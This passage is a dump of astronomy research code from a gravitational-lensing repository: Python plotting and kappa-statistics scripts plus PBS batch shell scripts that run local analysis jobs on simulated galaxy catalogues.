x + %.2f\" % (m,b)\n#m, b = np.polyfit(x, y, 1)\nx = x[np.where(abs(delta)<outlim)]\ny = y[np.where(abs(delta)<outlim)]\ndef func(x, m):\n return m+x\nfit=optimization.curve_fit(func, x, y, np.array([0])) # the array contains the initial guesses\nm=fit[0][0]\nbias = \"bias = %.3f\" % m\nx = np.linspace(0, 20, 1000)\n#plt.plot(x, m*x + b, '--')\nplt.plot(x, m+x, '--')\nplt.plot(x, x+0.5, 'r--')\nplt.plot(x, x-0.5, 'r--')\nplt.plot(x, x)\nax1.text(0.05, 0.95, stdoutobj, fontsize=7, color='black',transform=ax1.transAxes)\nax1.text(0.05, 0.90, stdout, fontsize=7, color='black',transform=ax1.transAxes)\nax1.text(0.05, 0.85, outlier, fontsize=7, color='black',transform=ax1.transAxes)\nax1.text(0.05, 0.80, bias, fontsize=7, color='black',transform=ax1.transAxes)\n#ax1.text(0.05, 0.80, bestfit, fontsize=7, color='black',transform=ax1.transAxes)\nplt.xlabel('catalogue $\\log M_{halo}$ ugriJHK', fontsize=font)\nplt.ylabel('measured $\\log M_{halo}$ ugriJHK', fontsize=font)\n#plt.xlim(0, 3.5)\n#plt.ylim(0, 3.5)\nplt.xlim(zlim_, zlim)\nplt.ylim(zlim_, zlim)\n#plt.title(' ugriJHK catalogue - measured Mstar')\n\n\nax1=plt.subplot(3,2,6)\nax1.set_aspect(1)\nfor i in range(7):\n for j in range(4):\n for k in range(4):\n x_, y_ = np.loadtxt(\"/Volumes/perseus_1/simulations/lensing_simulations/SA_galaxies/original/WFI2033/GGL_los_8_0_%s_%s_%s_N_4096_ang_4_SA_galaxies_on_plane_27_to_63_ugriz.images_forNAOJ.txt\" % (i,j,k), usecols=(4, 10), unpack=True)\n if (i==0) & (j==0) & (k==0):\n x = x_\n y = y_\n else:\n x = np.append(x,x_)\n y = np.append(y,y_)\nzlim = 14.5\nzlim_ = 10\noutlim = 0.5\nx = np.log10(x)\nx = x[abs(y) <= zlim]\ny = y[abs(y) <= zlim]\ny = y[abs(x) <= zlim]\nx = x[abs(x) <= zlim]\nx = x[abs(y) > zlim_]\ny = y[abs(y) > zlim_]\ny = y[abs(x) > zlim_]\nx = x[abs(x) > zlim_]\nhist2d(x, y, bins=[100, 100], norm=LogNorm())\nplt.xticks(rotation='vertical',size = ticksize)\nplt.yticks(size = ticksize)\n#m, b = np.polyfit(x, y, 1)\ndef func(x, m):\n return m+x\ndelta = y-x\ncolorbar()\n#delta = (y-(m+x))/(1+x)\n#firstpass_std = np.std(delta)\nfirstpass_std = np.std(delta)\nstd = np.std(delta[abs(delta)<outlim])\nstdoutobj = \"%d objects\" % len(x)\nstdout = \"scatter = %.3f\" % std\n#out = 100.0*len(delta[abs(delta)>(4 * std)])/len(delta)\noutnr = len(delta[abs(delta)>outlim])\nout = 100.0*len(delta[abs(delta)>outlim])/len(delta)\noutlier = \"outliers = %d (%.2f %%)\" % (outnr,out)\n#bestfit = \"best-fit line = %.2f * x + %.2f\" % (m,b)\n#m, b = np.polyfit(x, y, 1)\nx = x[np.where(abs(delta)<outlim)]\ny = y[np.where(abs(delta)<outlim)]\ndef func(x, m):\n return m+x\nfit=optimization.curve_fit(func, x, y, np.array([0])) # the array contains the initial guesses\nm=fit[0][0]\nbias = \"bias = %.3f\" % m\nx = np.linspace(0, 20, 1000)\n#plt.plot(x, m*x + b, '--')\nplt.plot(x, m+x, '--')\nplt.plot(x, x+0.5, 'r--')\nplt.plot(x, x-0.5, 'r--')\nplt.plot(x, x)\nax1.text(0.05, 0.95, stdoutobj, fontsize=7, color='black',transform=ax1.transAxes)\nax1.text(0.05, 0.90, stdout, fontsize=7, color='black',transform=ax1.transAxes)\nax1.text(0.05, 0.85, outlier, fontsize=7, color='black',transform=ax1.transAxes)\nax1.text(0.05, 0.80, bias, fontsize=7, color='black',transform=ax1.transAxes)\n#ax1.text(0.05, 0.80, bestfit, fontsize=7, color='black',transform=ax1.transAxes)\nplt.xlabel('catalogue $\\log M_{halo}$ ugriz', fontsize=font)\nplt.ylabel('measured $\\log M_{halo}$ ugriz', fontsize=font)\n#plt.xlim(0, 3.5)\n#plt.ylim(0, 3.5)\nplt.xlim(zlim_, zlim)\nplt.ylim(zlim_, zlim)\n#plt.title(' ugriz catalogue - measured Mstar')\n\n#cbaxes = fig.add_axes([0.8, 0.1, 0.03, 0.8])\n#cb = plt.colorbar(ax1, cax = cbaxes)\n\n#fig.subplots_adjust(right=0.8)\n#cbar_ax = fig.add_axes([0.85, 0.15, 0.05, 0.7])\n#fig.colorbar(im, cax=cbar_ax)\n\n#plt.subplots_adjust(left=0.1, bottom=0.1, right=0.80, top=0.90, wspace=0.4, hspace=0.4)\n#plt.tight_layout()\nplt.savefig('/Volumes/perseus_1/simulations/lensing_simulations/SA_galaxies/original/WFI2033/WFI2033_photoz_Mstar_Mhalo.png' , dpi=250)\n" }, { "alpha_fraction": 0.58349609375, "alphanum_fraction": 0.6722005009651184, "avg_line_length": 55.86111068725586, "blob_id": "1ad3033978eac3e17a0a980a5ce0ee84574c2aa1", "content_id": "6b8b2a4a1e51e4ec41d4ac471cf32c20c0fe9984", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6144, "license_type": "no_license", "max_line_length": 173, "num_lines": 108, "path": "/python/kappaplotcustom.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "\n# run from the Guo_galaxies folder as: python /Users/perseus/Dropbox/Davis_work/code/kappaplotcustom.py\n\n\nimport numpy as np\nimport scipy\nimport sys\nimport os\nfrom os import system\nfrom scipy import special\nfrom scipy import stats\nfrom astropy.io import fits\nfrom astropy.wcs import WCS\nfrom astropy import units as u\nfrom astropy.coordinates import SkyCoord\nfrom astropy.io import ascii\nfrom astropy.table import Table, Column\nimport time\nimport matplotlib.pyplot as plt\nfrom scipy.stats.kde import gaussian_kde\nfrom numpy import linspace\n\nfile1=\"GGL_los_N_4096_ang_4_Guo_galaxies_on_plane_27_to_63_pdzmstar_noJHKs_B1608_orig_size45_i24_ratioquick_kappa.dat\"\nfile2=\"GGL_los_N_4096_ang_4_Guo_galaxies_on_plane_27_to_63_pdzmstar_noJHKs_B1608_tab_size45_i24_ratioquick_gal_2.0_0.2_kappa.dat\"\nfile3=\"GGL_los_N_4096_ang_4_Guo_galaxies_on_plane_27_to_63_pdzmstar_noJHKs_B1608_tab_size45_i24_ratioquick_gal_2.0_0.2_oneoverr_2.2_0.2_kappa.dat\"\nfile4=\"GGL_los_N_4096_ang_4_Guo_galaxies_on_plane_27_to_63_pdzmstar_noJHKs_B1608_tab_size45_i24_ratioquick_gal_2.0_0.2_oneoverr_2.2_0.2_massoverr_4.0_1.0_kappa.dat\"\n\ndata1 = np.loadtxt(file1)\ndata2 = np.loadtxt(file2)\ndata3 = np.loadtxt(file3)\ndata4 = np.loadtxt(file4)\nkappa1=data1.T\nkappa2=data2.T\nkappa3=data3.T\nkappa4=data4.T\n\n\n\noutput=str(file1)[0:len(str(file1))-21]+\"_custom_gal_oneoverr_mass.eps\"\nBINS=100\nplt.suptitle(r'%s' % output[68:len(str(file1))-21], fontsize=15, y=0.998)\n#x = linspace(0,2,500)\n#plt.subplot(451)\n#n_q, bins_q, patches = plt.hist(q, histtype='step', color='b', label='W4sim', linewidth=0.5, normed=1, bins=BINS, range=[0, rangemax])\nplt.subplot(1,1,1)\nif file1[101:len(file1)-10]!=\"\":\n plt.hist(kappa1, histtype='step', color='b', label=\"No constraints\", linewidth=1, normed=1, bins=BINS, range=[-0.05, 0.2])\nelse:\n plt.hist(kappa1, histtype='step', color='b', label=\"No constraints\", linewidth=1, normed=1, bins=BINS, range=[-0.05, 0.2])\nif file3[101:len(file3)-10]!=\"\":\n plt.hist(kappa3, histtype='step', color='g', label=\"ratios: count 2.0$\\pm$0.2 $1/r$ 2.2$\\pm$0.2\", linewidth=1, normed=1, bins=BINS, range=[-0.05, 0.2])\nelse:\n plt.hist(kappa3, histtype='step', color='g', label=\"ratios: count 2.0$\\pm$0.2 $1/r$ 2.2$\\pm$0.2\", linewidth=1, normed=1, bins=BINS, range=[-0.05, 0.2])\nif file2[101:len(file2)-10]!=\"\":\n plt.hist(kappa2, histtype='step', color='r', label=\"ratios: count 2.0$\\pm$0.2\", linewidth=1, normed=1, bins=BINS, range=[-0.05, 0.2])\nelse:\n plt.hist(kappa2, histtype='step', color='r', label=\"ratios: count 2.0$\\pm$0.2\", linewidth=1, normed=1, bins=BINS, range=[-0.05, 0.2])\nif file4[101:len(file4)-10]!=\"\":\n plt.hist(kappa4, histtype='step', color='m', label=\"ratios: count 2.0$\\pm$0.2 $1/r$ 2.2$\\pm$0.2 $M/r$ 4.1$\\pm$1.0\", linewidth=1, normed=1, bins=BINS, range=[-0.05, 0.2])\nelse:\n plt.hist(kappa4, histtype='step', color='m', label=\"ratios: count 2.0$\\pm$0.2 $1/r$ 2.2$\\pm$0.2 $M/r$ 4.1$\\pm$1.0\", linewidth=1, normed=1, bins=BINS, range=[-0.05, 0.2])\n\n#if file1[101:len(file1)-10]!=\"\":\n# plt.hist(kappa1, histtype='step', color='b', label=file1[101:len(file1)-10], linewidth=1, normed=1, bins=BINS, range=[-0.05, 0.2])\n#else:\n# plt.hist(kappa1, histtype='step', color='b', label=\"no\", linewidth=1, normed=1, bins=BINS, range=[-0.05, 0.2])\n#if file3[101:len(file3)-10]!=\"\":\n# plt.hist(kappa3, histtype='step', color='g', label=file3[101:len(file3)-10], linewidth=1, normed=1, bins=BINS, range=[-0.05, 0.2])\n#else:\n# plt.hist(kappa3, histtype='step', color='g', label=\"no\", linewidth=1, normed=1, bins=BINS, range=[-0.05, 0.2])\n#if file4[101:len(file4)-10]!=\"\":\n# plt.hist(kappa4, histtype='step', color='m', label=file4[101:len(file4)-10], linewidth=1, normed=1, bins=BINS, range=[-0.05, 0.2])\n#else:\n# plt.hist(kappa4, histtype='step', color='m', label=\"no\", linewidth=1, normed=1, bins=BINS, range=[-0.05, 0.2])\n#if file2[101:len(file2)-10]!=\"\":\n# plt.hist(kappa2, histtype='step', color='r', label=file2[101:len(file2)-10], linewidth=1, normed=1, bins=BINS, range=[-0.05, 0.2])\n#else:\n# plt.hist(kappa2, histtype='step', color='r', label=\"no\", linewidth=1, normed=1, bins=BINS, range=[-0.05, 0.2])\n#plt.hist(kappa4, histtype='step', color='m', label=\"no\", linewidth=1, normed=1, bins=BINS, range=[-0.05, 0.2])\nax=plt.subplot(111)\ns = \"$\\kappa_\\mathrm{med}$=%.3f, $N\\_\\mathrm{LOS}$=%d\" % (np.average(kappa1),517500)\nax.text(0.3, 0.75, s, fontsize=15, color='b',transform=ax.transAxes)\ns = \"$\\kappa_\\mathrm{med}$=%.3f, $N\\_\\mathrm{LOS}$=%d\" % (np.average(kappa2),len(kappa2))\nax.text(0.3, 0.70, s, fontsize=15, color='r',transform=ax.transAxes)\ns = \"$\\kappa_\\mathrm{med}$=%.3f, $N\\_\\mathrm{LOS}$=%d\" % (np.average(kappa3),len(kappa3))\nax.text(0.3, 0.65, s, fontsize=15, color='g',transform=ax.transAxes)\ns = \"$\\kappa_\\mathrm{med}$=%.3f, $N\\_\\mathrm{LOS}$=%d\" % (np.average(kappa4),len(kappa4))\nax.text(0.3, 0.60, s, fontsize=15, color='m',transform=ax.transAxes)\n#s = \"med=%.3f, std=%.3f, $N\\_\\mathrm{LOS}$=%d\" % (np.average(kappa1),np.std(kappa1),len(kappa1))\n#ax.text(0.3, 0.75, s, fontsize=15, color='b',transform=ax.transAxes)\n#s = \"med=%.3f, std=%.3f, $N\\_\\mathrm{LOS}$=%d\" % (np.average(kappa2),np.std(kappa2),len(kappa2))\n#ax.text(0.3, 0.70, s, fontsize=15, color='r',transform=ax.transAxes)\n#s = \"med=%.3f, std=%.3f, $N\\_\\mathrm{LOS}$=%d\" % (np.average(kappa3),np.std(kappa3),len(kappa3))\n#ax.text(0.3, 0.65, s, fontsize=15, color='g',transform=ax.transAxes)\n#s = \"med=%.3f, std=%.3f, $N\\_\\mathrm{LOS}$=%d\" % (np.average(kappa4),np.std(kappa4),len(kappa4))\n#ax.text(0.3, 0.60, s, fontsize=15, color='m',transform=ax.transAxes)\n#text(0.5, 0.5,'matplotlib',horizontalalignment='center',verticalalignment='center',transform = ax.transAxes)\n#plt.xlabel(r'$\\zeta_{gal}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=20)\nplt.xlabel(r'$\\kappa_\\mathrm{ext}$', fontsize=20)\nplt.tick_params(axis='x', labelsize=13)\nplt.tick_params(axis='y', labelsize=13)\nplt.setp(plt.xticks()[1], rotation=90)\nplt.legend(bbox_to_anchor=(0.30, 0.9), loc='center left', borderaxespad=0., fontsize=10)\n#plt.subplots_adjust(top=0.6)\n#plt.tight_layout()\nplt.savefig('%s' % output, dpi=500)\n#plt.show()\nprint 'Done!'\n\n\n" }, { "alpha_fraction": 0.7010309100151062, "alphanum_fraction": 0.8247422575950623, "avg_line_length": 96, "blob_id": "ee1e3cbebfc88a407d743ec7d9a2f76928eeb1c6", "content_id": "08ecc4daddcaf7d13bcb4a030690c573bba6a8c8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 776, "license_type": "no_license", "max_line_length": 96, "num_lines": 8, "path": "/python/scripts/NAOJ/script_extractMillennium8.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "python extractMillennium_Henriques.py GGL_los_8_7_0_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_7_1_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_7_2_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_7_3_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_7_4_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_7_5_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_7_6_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_7_7_N_4096_ang_4_Henriques2014_galaxies_on_plane\n" }, { "alpha_fraction": 0.658695638179779, "alphanum_fraction": 0.79347825050354, "avg_line_length": 45.04999923706055, "blob_id": "e728b818b3645f748dbb6796935ef2d38887cb7c", "content_id": "f1c894267e42041bae8dfd3d2d593188a3d9ca14", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 920, "license_type": "no_license", "max_line_length": 176, "num_lines": 20, "path": "/python/scripts/NAOJ/batch_infersim2new.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n##PBS -r y\n#PBS -m abe\n#PBS -q q4\n#PBS -o Log2.out\n#PBS -e Log2.err\n#PBS -N 2\n#PBS -l mem=30gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /lfs08/rusucs/code/\n\npython inferkappa_unbiasedwithshear45and120FITSio.py J1206 -1.0 -1.0 removegrouphandpicked fiducial notempty 5 23 measured med 120_gal 120_gamma 120_oneoverr 45_gal 45_oneoverr\npython inferkappa_unbiasedwithshear45and120FITSio.py J1206 -1.0 -1.0 removegrouphandpicked fiducial notempty 5 23 measured med 120_gal 120_gamma 120_zoverr 45_gal 45_zoverr\npython inferkappa_unbiasedwithshear45and120FITSio.py J1206 -1.0 -1.0 removegrouphandpicked fiducial notempty 5 24 measured med 120_gal 120_gamma 120_oneoverr 45_gal 45_oneoverr\npython inferkappa_unbiasedwithshear45and120FITSio.py J1206 -1.0 -1.0 removegrouphandpicked fiducial notempty 5 24 measured med 120_gal 120_gamma 120_zoverr 45_gal 45_zoverr" }, { "alpha_fraction": 0.6660482287406921, "alphanum_fraction": 0.771799623966217, "avg_line_length": 25.950000762939453, "blob_id": "5288d7dca7ed1a5dfcb523dafba4cdbbfb84bbcd", "content_id": "4cf1ef411ba549d84229c1bb5066c1e7a44c20b3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 539, "license_type": "no_license", "max_line_length": 75, "num_lines": 20, "path": "/python/scripts/NAOJ/batch_infersim28.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n#PBS -r y\n#PBS -m abe\n#PBS -q q1m\n#PBS -o Log28s.out\n#PBS -e Log28s.err\n#PBS -N 28s\n#PBS -l mem=16gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /mfst01a/rusucs/WFI2033/MSwghtratios/\n\npython inferkappasimbias.py WFI2033 5 45 23 meds gal oneoverr mass2rms\npython inferkappasimbias.py WFI2033 5 120 23 meds gal oneoverr mass2rms\npython inferkappasimbiasphil.py WFI2033 5 45 23 meds gal oneoverr mass2rms\npython inferkappasimbiasphil.py WFI2033 5 120 23 meds gal oneoverr mass2rms\n" }, { "alpha_fraction": 0.6600984930992126, "alphanum_fraction": 0.743842363357544, "avg_line_length": 26.066667556762695, "blob_id": "1c30db6420cc6f0ea7e390a9612483306cdc5401", "content_id": "7c7a02f8584be0c7852edc8940c05cfcdf10edd0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 406, "license_type": "no_license", "max_line_length": 79, "num_lines": 15, "path": "/python/modeling_utilities/glaficextend_extractwithhead.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Header manupulation\n\nfrom astropy.io import fits\n\nimage0 = fits.open('../../F125W_visit1_highres_drz_sci_cut.fits')\ndata0 = image0[0].data\nhead0 = image0[0].header\n\nimage1 = fits.open('glafic125_1_extendSIEgamma_image.fits')\ndata1 = image1[0].data[5]\n\nimage2 = image0\nimage2[0].header = head0\nimage2[0].data = data0 - data1\nimage2.writeto('glafic125_1_extendSIEgamma_image_subtract.fits',overwrite=True)\n" }, { "alpha_fraction": 0.6352829337120056, "alphanum_fraction": 0.7874464988708496, "avg_line_length": 62.727272033691406, "blob_id": "68fd055623d09d5bd8aaf9d312af6818a4a2a71d", "content_id": "e007705f1ae5f006e8daf312d8ca30ebc13cf63b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 2103, "license_type": "no_license", "max_line_length": 117, "num_lines": 33, "path": "/python/scripts/NAOJ/batch7_insertstars.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n#PBS -r y\n#PBS -m abe\n#PBS -q q1\n#PBS -o Logb7.out\n#PBS -e Logb7.err\n#PBS -N 7\n#PBS -l mem=11gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /lfs08/rusucs/code/\n\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_7_0_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_7_1_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_7_2_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_7_3_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_7_4_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_7_5_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_7_6_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_7_7_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\n\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_7_0_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_7_1_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_7_2_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_7_3_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_7_4_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_7_5_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_7_6_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_7_7_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\n" }, { "alpha_fraction": 0.7120226621627808, "alphanum_fraction": 0.7641628384590149, "avg_line_length": 93.37623596191406, "blob_id": "b1ccf00e5d4e7cbb6595ff7ce6ee6246442fbe56", "content_id": "5b9c51bbfdb37968d7fdcde4e855ee679ff10765", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9532, "license_type": "no_license", "max_line_length": 850, "num_lines": 101, "path": "/python/catalogue_utilities/plotkappabiascompletestatistics.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# The code computes medians and 184h, 84th percentiles from all the unbiased kappa files\n# Run as python plotkappabiascompletecompute.py WFI2033 5 23 45\n\nimport scipy as sp\nfrom scipy.stats import norm\nimport numpy as np\nimport sys\nimport os\nfrom os import system\n\nlens = str(sys.argv[1])\ninner = str(sys.argv[2])\nmag = str(sys.argv[3])\nrad = str(sys.argv[4])\n\nroot = \"/Users/eduardrusu/Dropbox/Davis_work/code/GOODCODE/WFI2033kappa/\"\n\ndef compute(kappa_counts_):\n if np.median(kappa_counts_[4]) > 2:\n median = np.median(kappa_counts_[1] - kappa_counts_[0])\n std = (np.percentile(kappa_counts_[1] - kappa_counts_[0],84) - np.percentile(kappa_counts_[1] - kappa_counts_[0],16))/2.0\n else: median = float('nan'); std = float('nan');\n print np.median((kappa_counts_[3] - kappa_counts_[2])/2.0),np.median(kappa_counts_[4])\n return median, std\n\nkappa_counts1 = np.loadtxt(\"%skappasimbias_%s_%sinnermask_nobeta_gal_gamma_oneoverr_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts1_gal = np.loadtxt(\"%skappasimbias_%s_%sinnermask_nobeta_gal_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts1_galgamma = np.loadtxt(\"%skappasimbias_%s_%sinnermask_nobeta_gal_gamma_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts2 = np.loadtxt(\"%skappasimbias_%s_%sinnermask_nobeta_gal_gamma_oneoverr_z_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts2_ = np.loadtxt(\"%skappasimbias_%s_%sinnermask_nobeta_gal_oneoverr_z_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts3 = np.loadtxt(\"%skappasimbias_%s_%sinnermask_nobeta_gal_gamma_oneoverr_mass_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts3_ = np.loadtxt(\"%skappasimbias_%s_%sinnermask_nobeta_gal_oneoverr_mass_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts4 = np.loadtxt(\"%skappasimbias_%s_%sinnermask_nobeta_gal_gamma_oneoverr_mass2_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts4_ = np.loadtxt(\"%skappasimbias_%s_%sinnermask_nobeta_gal_oneoverr_mass2_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts5 = np.loadtxt(\"%skappasimbias_%s_%sinnermask_nobeta_gal_gamma_oneoverr_mass3_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts5_ = np.loadtxt(\"%skappasimbias_%s_%sinnermask_nobeta_gal_oneoverr_mass3_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts6 = np.loadtxt(\"%skappasimbias_%s_%sinnermask_nobeta_gal_oneoverr_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts7 = np.loadtxt(\"%skappasimbias_%s_%sinnermask_nobeta_gal_gamma_oneoverr_zoverr_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts7_ = np.loadtxt(\"%skappasimbias_%s_%sinnermask_nobeta_gal_oneoverr_zoverr_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts8 = np.loadtxt(\"%skappasimbias_%s_%sinnermask_nobeta_gal_gamma_oneoverr_massoverr_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts8_ = np.loadtxt(\"%skappasimbias_%s_%sinnermask_nobeta_gal_oneoverr_massoverr_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts9 = np.loadtxt(\"%skappasimbias_%s_%sinnermask_nobeta_gal_gamma_oneoverr_mass2overr_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts9_ = np.loadtxt(\"%skappasimbias_%s_%sinnermask_nobeta_gal_oneoverr_mass2overr_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts10 = np.loadtxt(\"%skappasimbias_%s_%sinnermask_nobeta_gal_gamma_oneoverr_mass3overr_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts10_ = np.loadtxt(\"%skappasimbias_%s_%sinnermask_nobeta_gal_oneoverr_mass3overrrms_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts11 = np.loadtxt(\"%skappasimbias_%s_%sinnermask_nobeta_gal_gamma_oneoverr_mass2rms_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts11_ = np.loadtxt(\"%skappasimbias_%s_%sinnermask_nobeta_gal_oneoverr_mass2rms_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts12 = np.loadtxt(\"%skappasimbias_%s_%sinnermask_nobeta_gal_gamma_oneoverr_mass3rms_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts12_ = np.loadtxt(\"%skappasimbias_%s_%sinnermask_nobeta_gal_oneoverr_mass3rms_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts13 = np.loadtxt(\"%skappasimbias_%s_%sinnermask_nobeta_gal_gamma_oneoverr_mass2overrrms_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts13_ = np.loadtxt(\"%skappasimbias_%s_%sinnermask_nobeta_gal_oneoverr_mass2overrrms_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts14 = np.loadtxt(\"%skappasimbias_%s_%sinnermask_nobeta_gal_gamma_oneoverr_mass3overrrms_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts14_ = np.loadtxt(\"%skappasimbias_%s_%sinnermask_nobeta_gal_oneoverr_mass3overrrms_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts15 = np.loadtxt(\"%skappasimbias_%s_%sinnermask_nobeta_gal_gamma_oneoverr_flexion_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts15_ = np.loadtxt(\"%skappasimbias_%s_%sinnermask_nobeta_gal_oneoverr_flexion_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts16 = np.loadtxt(\"%skappasimbias_%s_%sinnermask_nobeta_gal_gamma_oneoverr_tidal_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts16_ = np.loadtxt(\"%skappasimbias_%s_%sinnermask_nobeta_gal_oneoverr_tidal_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts17 = np.loadtxt(\"%skappasimbias_%s_%sinnermask_nobeta_gal_gamma_oneoverr_SIS_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts17_ = np.loadtxt(\"%skappasimbias_%s_%sinnermask_nobeta_gal_oneoverr_SIS_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts18 = 